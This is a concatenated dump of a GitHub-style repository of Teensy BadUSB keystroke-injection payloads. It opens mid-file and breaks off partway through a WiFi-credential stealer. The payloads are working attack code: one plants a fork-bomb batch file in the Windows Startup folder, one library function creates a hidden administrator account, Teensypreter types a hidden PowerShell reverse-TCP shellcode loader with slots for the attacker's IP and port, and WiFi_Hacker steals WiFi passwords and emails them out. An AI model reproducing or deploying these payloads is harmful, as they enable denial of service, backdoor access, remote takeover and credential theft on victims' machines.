56 | Keyboard.set_modifier(0); 57 | Keyboard.set_key1(0); 58 | Keyboard.send_now(); 59 | delay(3000); 60 | Keyboard.set_modifier(MODIFIERKEY_ALT); 61 | Keyboard.set_key1(KEY_Y); 62 | Keyboard.send_now(); 63 | Keyboard.set_modifier(0); 64 | Keyboard.set_key1(0); 65 | Keyboard.send_now(); 66 | delay(1000); 67 | // Change directory to startup programs 68 | Keyboard.print("cd %UserProfile%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\"); 69 | Keyboard.set_key1(KEY_ENTER); 70 | Keyboard.send_now(); 71 | Keyboard.set_modifier(0); 72 | Keyboard.set_key1(0); 73 | Keyboard.send_now(); 74 | delay(500); 75 | // Write fork bomb batch file 76 | Keyboard.print("copy con 6rgl4ljf4m.bat"); 77 | Keyboard.set_key1(KEY_ENTER); 78 | Keyboard.send_now(); 79 | Keyboard.print("@echo off"); 80 | Keyboard.set_key1(KEY_ENTER); 81 | Keyboard.send_now(); 82 | Keyboard.print(":START"); 83 | Keyboard.set_key1(KEY_ENTER); 84 | Keyboard.send_now(); 85 | Keyboard.print("start \"%UserProfile%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\6rgl4ljf4m.bat\""); 86 | Keyboard.set_key1(KEY_ENTER); 87 | Keyboard.send_now(); 88 | Keyboard.print("GOTO START"); 89 | Keyboard.set_key1(KEY_ENTER); 90 | Keyboard.send_now(); 91 | Keyboard.set_modifier(0); 92 | Keyboard.set_key1(0); 93 | Keyboard.send_now(); 94 | delay(500); 95 | Keyboard.set_modifier(MODIFIERKEY_CTRL); 96 | Keyboard.set_key1(KEY_Z); 97 | Keyboard.send_now(); 98 | Keyboard.set_modifier(0); 99 | Keyboard.set_key1(0); 100 | Keyboard.send_now(); 101 | delay(500); 102 | // End of file 103 | Keyboard.set_key1(KEY_ENTER); 104 | Keyboard.send_now(); 105 | Keyboard.set_modifier(0); 106 | Keyboard.set_key1(0); 107 | Keyboard.send_now(); 108 | delay(500); 109 | // Optional: Comment block to avoid executing fork bomb, making it dormant until the next and every startup. 110 | Keyboard.print("6rgl4ljf4m.bat"); 111 | Keyboard.set_key1(KEY_ENTER); 112 | Keyboard.send_now(); 113 | Keyboard.set_modifier(0); 114 | Keyboard.set_key1(0); 115 | Keyboard.send_now(); 116 | delay(500); 117 | 118 | } 119 | 120 | void loop() 121 | { 122 | // blink quickly when complete 123 | digitalWrite(LED_PIN, HIGH); 124 | delay(ds/2); 125 | digitalWrite(LED_PIN, LOW); 126 | delay(ds/2); 127 | } 128 | -------------------------------------------------------------------------------- /Payloads/Dont-fuck-it-up.ino: -------------------------------------------------------------------------------- 1 | /* 2 | 3 | TeensyDuino ( BadUSB) Like a Rubber Ducky ) 4 | 5 | You can buy Teensy >> ( https://www.pjrc.com/teensy/teensyduino.html ) 6 | 7 | Tutorial >> ( https://www.pjrc.com/teensy/teensyduino.html ) , Youtube.com or Google.com :> 8 | 9 | PAYLOAD : 10 | 11 | 12 | Dont fuck it up in notepad ( ASCII ) >< ( PRANK ) YOUR FRIENDS :> 13 | 14 | 15 | @ Edo -m- you can contact me in screetsec@gmail.com 16 | 17 | */ 18 | 19 | int ds = 500; 20 | 21 | #if defined(CORE_TEENSY) 22 | #define LED_PIN 13 23 | #endif 24 | 25 | 26 | 27 | void setup() 28 | { 29 | 30 | // allow controlling LED 31 | pinMode(LED_PIN, OUTPUT); 32 | // turn the LED on while running 33 | digitalWrite(LED_PIN, HIGH); 34 | 35 | delay(5000); 36 | 37 | Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); 38 | Keyboard.set_key1(KEY_R); 39 | Keyboard.send_now(); 40 | 41 | delay(500); 42 | Keyboard.set_modifier(0); 43 | Keyboard.set_key1(0); 44 | Keyboard.send_now(); 45 | Keyboard.print("notepad.exe"); 46 | Keyboard.set_key1(KEY_ENTER); 47 | Keyboard.send_now(); 48 | Keyboard.set_key1(0); 49 | Keyboard.send_now(); 50 | 51 | delay(300); 52 | Keyboard.print("===================================================================================="); 53 | Keyboard.set_key1(KEY_ENTER); 54 | Keyboard.send_now(); 55 | 56 | delay(300); 57 | Keyboard.print("."); 58 | Keyboard.set_key1(KEY_ENTER); 59 | Keyboard.send_now(); 60 | 61 | delay(300); 62 | Keyboard.print(" #n n#n n#n #n n#n n# n"); 63 | Keyboard.set_key1(KEY_ENTER); 64 | Keyboard.send_now(); 65 | 66 | delay(300); 67 | Keyboard.print(" ####n######################## n#|"); 68 | Keyboard.set_key1(KEY_ENTER); 69 | Keyboard.send_now(); 70 | 71 | delay(300); 72 | Keyboard.print(" |###############################"); 73 | Keyboard.set_key1(KEY_ENTER); 74 | Keyboard.send_now(); 75 | 76 | delay(300); 77 | Keyboard.print(" ##############################|"); 78 | Keyboard.set_key1(KEY_ENTER); 79 | Keyboard.send_now(); 80 | 81 | delay(300); 82 | Keyboard.print(" ##############################"); 83 | Keyboard.set_key1(KEY_ENTER); 84 | Keyboard.send_now(); 85 | 86 | delay(300); 87 | Keyboard.print(" |#~~nnnnnn~~###~~nnnnn~~######|"); 88 | Keyboard.set_key1(KEY_ENTER); 89 | Keyboard.send_now(); 90 | 91 | delay(300); 92 | Keyboard.print(" ~n##########n~n#########n~####|"); 93 | Keyboard.set_key1(KEY_ENTER); 94 | Keyboard.send_now(); 95 | 96 | delay(300); 97 | Keyboard.print(" #############|############ ###"); 98 | Keyboard.set_key1(KEY_ENTER); 99 | Keyboard.send_now(); 100 | 101 | delay(300); 102 | Keyboard.print(" |####~######|####~########||#~"); 103 | Keyboard.set_key1(KEY_ENTER); 104 | Keyboard.send_now(); 105 | 106 | delay(300); 107 | Keyboard.print(" nnn ###########~~|############ #n#~n"); 108 | Keyboard.set_key1(KEY_ENTER); 109 | Keyboard.send_now(); 110 | 111 | delay(300); 112 | Keyboard.print(" |###| ~#####~nnn##n~#########~n###n##|"); 113 | Keyboard.set_key1(KEY_ENTER); 114 | Keyboard.send_now(); 115 | 116 | delay(300); 117 | Keyboard.print(" |#### nnnn~~~|#######nn~~~~~nn###n~##~"); 118 | Keyboard.set_key1(KEY_ENTER); 119 | Keyboard.send_now(); 120 | 121 | delay(300); 122 | Keyboard.print(" |### |#######n~~~~~nn#############|"); 123 | Keyboard.set_key1(KEY_ENTER); 124 | Keyboard.send_now(); 125 | 126 | delay(300); 127 | Keyboard.print(" |##| |#########################~ ###"); 128 | Keyboard.set_key1(KEY_ENTER); 129 | Keyboard.send_now(); 130 | 131 | delay(300); 132 | Keyboard.print(" nn#nn###nn#n ~~#################~~~~ n| ##|"); 133 | Keyboard.set_key1(KEY_ENTER); 134 | Keyboard.send_now(); 135 | 136 | delay(300); 137 | Keyboard.print(" |##########~## ~~~~~ nnnn nnnn ###~ ~ n##"); 138 | Keyboard.set_key1(KEY_ENTER); 139 | Keyboard.send_now(); 140 | 141 | delay(300); 142 | Keyboard.print(" |###########|n# n ~~~~ ~~~~nnnn~~nn##"); 143 | Keyboard.set_key1(KEY_ENTER); 144 | Keyboard.send_now(); 145 | 146 | delay(300); 147 | Keyboard.print(" ~###########|~ |##nn~~~~~~~~nnn####~"); 148 | Keyboard.set_key1(KEY_ENTER); 149 | Keyboard.send_now(); 150 | 151 | delay(300); 152 | Keyboard.print(" ~~########| ~~~###############|"); 153 | Keyboard.set_key1(KEY_ENTER); 154 | Keyboard.send_now(); 155 | 156 | delay(300); 157 | Keyboard.print(" ~~########| ~~~###############|"); 158 | Keyboard.set_key1(KEY_ENTER); 159 | Keyboard.send_now(); 160 | 161 | delay(300); 162 | Keyboard.print(" |#######| nnnn###n~~~~~~~~~nn#####nnn"); 163 | Keyboard.set_key1(KEY_ENTER); 164 | Keyboard.send_now(); 165 | 166 | delay(300); 167 | Keyboard.print(" |######## nn##############################n"); 168 | Keyboard.set_key1(KEY_ENTER); 169 | Keyboard.send_now(); 170 | 171 | delay(300); 172 | Keyboard.print("."); 173 | Keyboard.set_key1(KEY_ENTER); 174 | Keyboard.send_now(); 175 | 176 | delay(300); 177 | Keyboard.print(" DONT FUCK IT UP OKEYS"); 178 | Keyboard.set_key1(KEY_ENTER); 179 | Keyboard.send_now(); 180 | 181 | delay(300); 182 | Keyboard.print("===================================================================================="); 183 | Keyboard.set_key1(KEY_ENTER); 184 | Keyboard.send_now(); 185 | Keyboard.set_key1(0); 186 | Keyboard.send_now(); 187 | 188 | } 189 | 190 | void loop() 191 | { 192 | // blink quickly when complete 193 | digitalWrite(LED_PIN, HIGH); 194 | delay(ds/2); 195 | digitalWrite(LED_PIN, LOW); 196 | delay(ds/2); 197 | } 198 | -------------------------------------------------------------------------------- /PaensyLib/paensy.cpp: -------------------------------------------------------------------------------- 1 | /*** 2 | * ______ _____ __ 3 | * | ___ \ | _ |/ | 4 | * | |_/ /_ _ ___ _ __ ___ _ _ | |/' |`| | 5 | * | __/ _` |/ _ \ '_ \/ __| | | | | /| | | | 6 | * | | | (_| | __/ | | \__ \ |_| | \ |_/ /_| |_ 7 | * \_| \__,_|\___|_| |_|___/\__, | \___(_)___/ 8 | * __/ | 9 | * |___/ 10 | * _ _____ 11 | * | | | _ | 12 | * | |__ _ _ | | | |_____ _ _ __ _ _ 13 | * | '_ \| | | | | | | |_ / | | | '__| | | | 14 | * | |_) | |_| | \ \_/ // /| |_| | | | |_| | 15 | * |_.__/ \__, | \___//___|\__,_|_| \__,_| 16 | * __/ | 17 | * |___/ 18 | * 19 | * 20 | * This is Paensy 0.1 by Ozuru. Paensy is an attacker-oriented library for the Teensy 3.1 microcontroller. 21 | * 22 | * If you have any questions, feel free to open a ticket on the GitHub repository. 23 | * 24 | * Instructions: place paensy.cpp and paensy.h inside Arduino\libraries\PaensyLib\. 25 | * 26 | * To utilize the library, add #include to the top of your file. 27 | * 28 | * http://www.malware.cat/ is my personal website and cyber-security oriented blog - check it out if you enjoy this! 29 | * 30 | */ 31 | 32 | #include "WProgram.h" 33 | #include "paensy.h" 34 | 35 | int delayAm; 36 | int morseDelay; 37 | int LED_PIN; 38 | 39 | /** 40 | * Sets the delay. Almost every task scales off of the delay so be sure to play around with this. 100 works well for me. 41 | **/ 42 | void SetDelay(int _delayAm) { 43 | delayAm = _delayAm; 44 | } 45 | 46 | /** 47 | * Sets the Morse code delay. This is a matter of personal preference. 250 works well for me. 48 | **/ 49 | void SetMorseDelay(int _morseDelay) { 50 | morseDelay = _morseDelay; 51 | } 52 | 53 | /** 54 | * Sets the LED pin number. 55 | * 56 | * Defaults: 57 | * 58 | * 3.1 - pin 13 59 | * 2.0 - pin 11 60 | * 1.0, 1.0++, and 2.0++ - pin 6 61 | **/ 62 | void SetLEDPin(int _LED_PIN) { 63 | LED_PIN = _LED_PIN; 64 | } 65 | 66 | /** 67 | * Returns the delay. 68 | **/ 69 | int GetDelay() { 70 | return delayAm; 71 | } 72 | 73 | /** 74 | * Returns the Morse delay. 75 | **/ 76 | int GetMorseDelay() { 77 | return morseDelay; 78 | } 79 | 80 | /** 81 | * Returns the LED pin number. 82 | **/ 83 | int GetLEDPin() { 84 | return LED_PIN; 85 | } 86 | 87 | /** 88 | * Performs the initial delay. I find that it's required to give the microcontroller time to boot up and get itself situated. 89 | * I personally keep it at 60, feel free to change that if it feels too absurd. 90 | **/ 91 | void PerformInitDelay() { 92 | delay(delayAm * 30); 93 | } 94 | /** 95 | * Opens the run prompt and executes whatever *command is. 96 | **/ 97 | void RunCommand(char *command) { 98 | Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); //Windows key 99 | Keyboard.set_key1(KEY_R); 100 | Keyboard.send_now(); // Send keys to the system 101 | Keyboard.set_modifier(0); // Release the GUI (Windows) key 102 | delay(delayAm * 1.5); 103 | Keyboard.set_key1(0); // No key 104 | Keyboard.send_now(); // Send the key change 105 | delay(delayAm*2.2); 106 | Keyboard.print(command); 107 | Keyboard.set_key1(KEY_ENTER); 108 | Keyboard.send_now(); 109 | delay(delayAm*1.5); 110 | Keyboard.set_key1(0); 111 | Keyboard.send_now(); 112 | delay(delayAm); 113 | } 114 | 115 | /** 116 | * Hides the current window. 117 | * An input of screen height is taken and divided by a constant value to determine how many times to press the down arrow. 118 | **/ 119 | void HideCurWindow(int screenHeight) { 120 | Alt(KEY_SPACE); 121 | PressKey(KEY_M, 1); 122 | PressKey(KEY_DOWN, ((int)(screenHeight/7.2))); 123 | Mouse.click(); 124 | delay(delayAm); 125 | } 126 | 127 | /** 128 | * Creates a new account and adds the user to administrator. 129 | * Closes the window after modification. 130 | **/ 131 | void AddUser(String uname, String pword) { 132 | TypeLn("net user " + uname + " /add"); 133 | TypeLn("net localgroup administrators " + uname + " /add"); 134 | TypeLn("net user " + uname + " *"); 135 | TypeLn(pword); 136 | TypeLn(pword); 137 | TypeLn("exit"); 138 | } 139 | 140 | /** 141 | * Presses a key as many times as specified. 142 | * PressKey(KEY_TAB, 10) would press the tab key 10 times. 143 | **/ 144 | void PressKey(int key, int amount) { 145 | for(int i = 0; i < amount; i++) { 146 | Keyboard.set_key1(key); 147 | Keyboard.send_now(); 148 | Keyboard.set_key1(0); 149 | Keyboard.send_now(); 150 | delay(delayAm/8); 151 | } 152 | } 153 | 154 | /** 155 | * Types out our input and then hits enter. 156 | **/ 157 | void TypeLn(String chars) { 158 | Keyboard.print(chars); 159 | delay(delayAm/2); 160 | Keyboard.println(""); 161 | delay(delayAm/2); 162 | } 163 | 164 | /** 165 | * Allows alt key combinations. 166 | * Example: Alt(KEY_ESC) would simulate pressing the escape key while holding alt. 167 | **/ 168 | void Alt(int key) { 169 | Keyboard.set_modifier(MODIFIERKEY_ALT); // Alt key 170 | Keyboard.set_key1(key); 171 | Keyboard.send_now(); // Send keys to the system 172 | Keyboard.set_modifier(0); // Release the key 173 | Keyboard.set_key1(0); // No key 174 | Keyboard.send_now(); // Send the key change 175 | } 176 | 177 | /** 178 | * Allows control key combinations. 179 | * Example: Ctrl(KEY_ALT) would simulate pressing the alt key while holding control. 180 | **/ 181 | void Ctrl(int key) { 182 | Keyboard.set_modifier(MODIFIERKEY_CTRL); // Control key 183 | Keyboard.set_key1(key); 184 | Keyboard.send_now(); // Send keys to the system 185 | Keyboard.set_modifier(0); // Release the key 186 | Keyboard.set_key1(0); // No key 187 | Keyboard.send_now(); // Send the key change 188 | } 189 | 190 | /** 191 | * Allows shift key combinations. 192 | * Example: Shift(KEY_ESC) would simulate pressing the escape key while holding shift. 193 | **/ 194 | void Shift(int key) { 195 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); // Shift key 196 | Keyboard.set_key1(key); 197 | Keyboard.send_now(); // Send keys to the system 198 | Keyboard.set_modifier(0); // Release the key 199 | Keyboard.set_key1(0); // No key 200 | Keyboard.send_now(); // Send the key change 201 | } 202 | 203 | /** 204 | * Makes the LED do a Morse code dot. 205 | **/ 206 | void LED_MorseDot() { 207 | digitalWrite(LED_PIN, HIGH); 208 | delay(morseDelay); 209 | digitalWrite(LED_PIN, LOW); 210 | delay(morseDelay); 211 | } 212 | 213 | /** 214 | * Makes the LED do a Morse code dash. 215 | **/ 216 | void LED_MorseDash() { 217 | digitalWrite(LED_PIN, HIGH); 218 | delay(morseDelay * 3); 219 | digitalWrite(LED_PIN, LOW); 220 | delay(morseDelay); 221 | } 222 | 223 | /** 224 | * Turns a LED on and off with a configurable delay and a configurable amount of times. 225 | * Example: LED_Flutter(200, 10) would cause the LED to alternate with a 200 millisecond delay 10 times, or turn on and off for 2 seconds every 200 milliseconds. 226 | **/ 227 | void LED_Flutter(int fDelay, int fAmount) { 228 | for(int i = 0; i < fAmount; i++) { 229 | digitalWrite(LED_PIN, HIGH); 230 | delay(fDelay); 231 | digitalWrite(LED_PIN, LOW); 232 | delay(fDelay); 233 | } 234 | } -------------------------------------------------------------------------------- /Payloads/Teensypreter.ino: -------------------------------------------------------------------------------- 1 | 2 | // Teensypreter by KernelEguino , thanks 3 | 4 | const unsigned int ledPin = 13; // My Teensy has the built-in LED on pin 13. 5 | 6 | void setup() 7 | { 8 | pinMode(ledPin, OUTPUT); 9 | digitalWrite(ledPin, HIGH); 10 | delay(500); 11 | digitalWrite(ledPin, LOW); 12 | hurryUp(); // Fucking drivers. 13 | spawnReverseTCP(); // This gets our shell. 14 | } 15 | 16 | void loop() // This is a one-off program. Looping is irrelevant. 17 | { 18 | } 19 | 20 | void hurryUp() // Wait for the driver to finish installing. 21 | { 22 | boolean areWeThereYet = capsCheck(); // Check and see if we can turn on Caps Lock yet. 23 | while (areWeThereYet == capsCheck()) // Spam the shit out of it if not. 24 | { 25 | returnCode(1, 500); 26 | hitCaps(); 27 | } 28 | hitCaps(); 29 | } 30 | 31 | boolean capsCheck() // Check if Caps Lock is on. 32 | { 33 | if ((activeLEDs() & 2) == 2) 34 | { 35 | return true; 36 | } 37 | else 38 | { 39 | return false; 40 | } 41 | } 42 | 43 | unsigned int activeLEDs() // Keyboard LED status. 44 | { 45 | return int(keyboard_leds); 46 | } 47 | 48 | void returnCode(unsigned int numBlinks, unsigned int halfDelay) 49 | { 50 | unsigned int count=0; 51 | for(count = 0; count != numBlinks; count++) 52 | { 53 | digitalWrite(ledPin, HIGH); 54 | delay(halfDelay); 55 | digitalWrite(ledPin, LOW); 56 | delay(halfDelay); 57 | } 58 | } 59 | 60 | void hitCaps() // Press the Caps Lock button. 61 | { 62 | Keyboard.set_key1(KEY_CAPS_LOCK); 63 | Keyboard.send_now(); 64 | delay(100); 65 | clearKeys(); 66 | } 67 | 68 | void clearKeys() // Empty the keystroke buffer. 69 | { 70 | Keyboard.set_modifier(0); 71 | Keyboard.set_key1(0); 72 | Keyboard.send_now(); 73 | delay(100); 74 | } 75 | 76 | void killCaps() // Turn off Caps Lock. 77 | { 78 | if (capsCheck()) 79 | { 80 | hitCaps(); 81 | } 82 | } 83 | 84 | void spawnReverseTCP() // Start the real magic. 85 | { 86 | killCaps(); // Turn off Caps Lock if it's on. 87 | 88 | returnCode(1, 100); // Keyboard is ready. 89 | 90 | Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI); // Open the Run dialog. 91 | Keyboard.set_key1(KEY_R); 92 | Keyboard.send_now(); 93 | clearKeys(); 94 | 95 | delay(1000); 96 | 97 | returnCode(1, 100); // Run is ready. 98 | 99 | Keyboard.print("cmd.exe /T:01 /K mode CON: COLS=15 LINES=1"); // Start CMD small with dark text. 100 | Keyboard.set_key1(KEY_ENTER); 101 | Keyboard.send_now(); 102 | clearKeys(); 103 | 104 | delay(3000); // Give CMD some time to appear. 105 | 106 | returnCode(1, 100); // CMD is ready. 107 | 108 | // The next line sets the Powershell path based on our architecture. 109 | Keyboard.println("if exist C:\\Windows\\SysWOW64 ( set PWRSHLXDD=C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell) else ( set PWRSHLXDD=powershell )"); 110 | 111 | returnCode(1, 100); // Everything is ready. 112 | 113 | 114 | /* * * * * * * * * * * * 115 | * * 116 | * Take the red pill. * 117 | * * 118 | * * * * * * * * * * * */ 119 | 120 | Keyboard.print("%PWRSHLXDD% -nop -w hidden -c \"$1 = '$c = ''"); 121 | Keyboard.print("[DllImport(\\\"kernel32.dll\\\")]public static ext"); 122 | Keyboard.print("ern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwS"); 123 | Keyboard.print("ize, uint flAllocationType, uint flProtect);[DllIm"); 124 | Keyboard.print("port(\\\"kernel32.dll\\\")]public static extern In"); 125 | Keyboard.print("tPtr CreateThread(IntPtr lpThreadAttributes, uint "); 126 | Keyboard.print("dwStackSize, IntPtr lpStartAddress, IntPtr lpParam"); 127 | Keyboard.print("eter, uint dwCreationFlags, IntPtr lpThreadId);[Dl"); 128 | Keyboard.print("lImport(\\\"msvcrt.dll\\\")]public static extern I"); 129 | Keyboard.print("ntPtr memset(IntPtr dest, uint src, uint count);''"); 130 | Keyboard.print(";$w = Add-Type -memberDefinition $c -Name \\\"Win3"); 131 | Keyboard.print("2\\\" -namespace Win32Functions -passthru;[Byte[]]"); 132 | Keyboard.print(";[Byte[]]$sc = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,"); 133 | Keyboard.print("0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,"); 134 | Keyboard.print("0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,"); 135 | Keyboard.print("0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,"); 136 | Keyboard.print("0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,"); 137 | Keyboard.print("0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,"); 138 | Keyboard.print("0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,"); 139 | Keyboard.print("0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,"); 140 | Keyboard.print("0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,"); 141 | Keyboard.print("0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,"); 142 | Keyboard.print("0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,"); 143 | Keyboard.print("0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,"); 144 | Keyboard.print("0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,"); 145 | Keyboard.print("0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,"); 146 | Keyboard.print("0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,"); 147 | Keyboard.print("0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,"); 148 | Keyboard.print("0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,"); 149 | Keyboard.print("0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,"); 150 | Keyboard.print("0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,"); 151 | Keyboard.print("0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,"); 152 | 153 | // Replace [0x@@,0x@@,0x@@,0x@@] with each part of your IP (in hex). 154 | // Replace [0x@@,0x@@] with your open port (e.g. 65535 = 0xFF,0xFF) 155 | // Don't forget to remove the [] brackets after editing. 156 | 157 | Keyboard.print("[0x@@,0x@@,0x@@,0x@@],0x68,0x02,0x00,[0x@@,0x@@],0"); 158 | 159 | // MAKE SURE YOU DELETE THE BRACKETS. 160 | // DO NOT PASS GO UNTIL YOU DELETE THE BRACKETS. 161 | 162 | Keyboard.print("x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0"); 163 | Keyboard.print("x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0"); 164 | Keyboard.print("x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0"); 165 | Keyboard.print("x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0"); 166 | Keyboard.print("xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0"); 167 | Keyboard.print("x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0"); 168 | Keyboard.print("xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0"); 169 | Keyboard.print("xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0"); 170 | Keyboard.print("xf6,0x75,0xec,0xc3;$size = 0x1000;if ($sc.Length -"); 171 | Keyboard.print("gt 0x1000){$size = $sc.Length};$x=$w::VirtualAlloc"); 172 | Keyboard.print("(0,0x1000,$size,0x40);for ($i=0;$i -le ($sc.Length"); 173 | Keyboard.print("-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $"); 174 | Keyboard.print("sc[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;"); 175 | Keyboard.print("){Start-sleep 60};';$gq = [System.Convert]::ToBase"); 176 | Keyboard.print("64String([System.Text.Encoding]::Unicode.GetBytes("); 177 | Keyboard.print("$1));if([IntPtr]::Size -eq 8){$x86 = $env:SystemRo"); 178 | Keyboard.print("ot + \\\"\\\\syswow64\\\\WindowsPowerShell\\\\v1.0"); 179 | Keyboard.print("\\\\powershell\\\";$cmd = \\\"-nop -noni -enc \\\""); 180 | Keyboard.print(";iex \\\" $x86 $cmd $gq\\\"}else{$cmd = \\\"-nop -"); 181 | Keyboard.print("noni -enc\\\";iex \\\" powershell $cmd $gq\\\";}\""); 182 | clearKeys(); 183 | Keyboard.set_key1(KEY_ENTER); 184 | Keyboard.send_now(); // Send the command. 185 | delay(100); 186 | clearKeys(); 187 | 188 | returnCode(1, 1000); // All done. 189 | } 190 | -------------------------------------------------------------------------------- /Payloads/WiFi_Hacker.ino: -------------------------------------------------------------------------------- 1 | /* 2 | * WiFi Hacker Script for Teensy. Adapted for Teensy by B3H1NDu / Keith Anderson 3 | * 4 | * This script finds the network information for the WiFi network the computer 5 | * is currently connected to. The script opens up a CMD window and hides it at 6 | * the bottom of the user's screen, with varying degrees of success from computer 7 | * to computer and run to run. The script then steals the SSID, Password, Network Type, and 8 | * Authentication and puts it into a text file on the victim's desktop. The script 9 | * then proceeds to exfiltrate the data contained in this file via email. A gmail 10 | * account is necessary for this step, however you may modify the script to accept 11 | * other email types. After this the script deletes the text file and closes the cmd 12 | * window, leaving no trace (unless you check the recycle bin.) 13 | * 14 | * In order to use, press ctrl+f and search "REPLACE". Replace "REPLACEUSER" 15 | * with your Gmail username and "REPLACEPASS" with your gmail password. 16 | * "REPLACEFROM" is the email you want to send your email from, I recommend 17 | * you have it as the Gmail address you used in the "REPLACEUSER" field. 18 | * "REPLACETO" is the email you want to send the email to. 19 | * 20 | * YOU MAY NEED TO ADJUST DELAYS FOR SLOWER COMPUTERS! 21 | * 22 | * This should work on most, if not all Teensys/Arduinos/DigiSparks, 23 | * as long as they have HID capabilities. This script has been ported 24 | * over from the USB Rubber Ducky Wiki, but it took a lot more work 25 | * than I thought it would because of problems with having quotation 26 | * marks in the commands. I now realise that my workaround could 27 | * have been much more elegant and simple, but I cannot be bothered 28 | * fixing it now. 29 | */ 30 | 31 | #include 32 | 33 | void setup() { 34 | 35 | // Configure the delay that everything else scales off of. 36 | SetDelay(200); 37 | // Configure the delay that the Morse code uses. 38 | SetMorseDelay(250); 39 | 40 | // Perform an initial delay to give the USB time to prepare. 41 | PerformInitDelay(); 42 | 43 | // LED pin number, 13 for 3.1 44 | // 11 for 2 and 2.x 45 | SetLEDPin(13); 46 | // Put the pin into output mode 47 | pinMode(LED_PIN, OUTPUT); 48 | // Turn on the LED pin so we know the device is running. 49 | digitalWrite(LED_PIN, HIGH); 50 | Keyboard.set_modifier(MODIFIERKEY_GUI); 51 | Keyboard.set_key1(KEY_D); 52 | Keyboard.send_now(); 53 | Keyboard.set_modifier(0); 54 | Keyboard.set_key1(0); 55 | Keyboard.send_now(); 56 | delay(500); 57 | RunCommand("cmd"); 58 | delay(500); 59 | Keyboard.set_modifier(MODIFIERKEY_ALT); 60 | Keyboard.set_key1(KEY_SPACE); 61 | Keyboard.send_now(); 62 | Keyboard.set_modifier(0); 63 | Keyboard.set_key1(0); 64 | Keyboard.send_now(); 65 | delay(100); 66 | PressKey(KEY_M, 1); 67 | delay(500); 68 | PressKey(KEY_DOWN, 100); 69 | PressKey(KEY_ENTER, 1); 70 | 71 | 72 | Keyboard.print("cd "); 73 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 74 | Keyboard.set_key1(KEY_QUOTE); 75 | Keyboard.send_now(); 76 | Keyboard.set_modifier(0); 77 | Keyboard.set_key1(0); 78 | Keyboard.send_now(); 79 | Keyboard.print("%USERPROFILE%"); 80 | Keyboard.set_key1(KEY_BACKSLASH); 81 | Keyboard.send_now(); 82 | Keyboard.set_key1(0); 83 | Keyboard.send_now(); 84 | Keyboard.print("Desktop"); 85 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 86 | Keyboard.set_key1(KEY_QUOTE); 87 | Keyboard.send_now(); 88 | Keyboard.set_modifier(0); 89 | Keyboard.set_key1(0); 90 | Keyboard.send_now(); 91 | Keyboard.print(" & for /f "); 92 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 93 | Keyboard.set_key1(KEY_QUOTE); 94 | Keyboard.send_now(); 95 | Keyboard.set_modifier(0); 96 | Keyboard.set_key1(0); 97 | Keyboard.send_now(); 98 | Keyboard.print("tokens=2 delims=: "); 99 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 100 | Keyboard.set_key1(KEY_QUOTE); 101 | Keyboard.send_now(); 102 | Keyboard.set_modifier(0); 103 | Keyboard.set_key1(0); 104 | Keyboard.send_now(); 105 | Keyboard.print(" %A in ('netsh wlan show interface ^| findstr "); 106 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 107 | Keyboard.set_key1(KEY_QUOTE); 108 | Keyboard.send_now(); 109 | Keyboard.set_modifier(0); 110 | Keyboard.set_key1(0); 111 | Keyboard.send_now(); 112 | Keyboard.print("SSID"); 113 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 114 | Keyboard.set_key1(KEY_QUOTE); 115 | Keyboard.send_now(); 116 | Keyboard.set_modifier(0); 117 | Keyboard.set_key1(0); 118 | Keyboard.send_now(); 119 | Keyboard.print(" ^| findstr /v "); 120 | Keyboard.set_modifier(MODIFIERKEY_SHIFT); 121 | 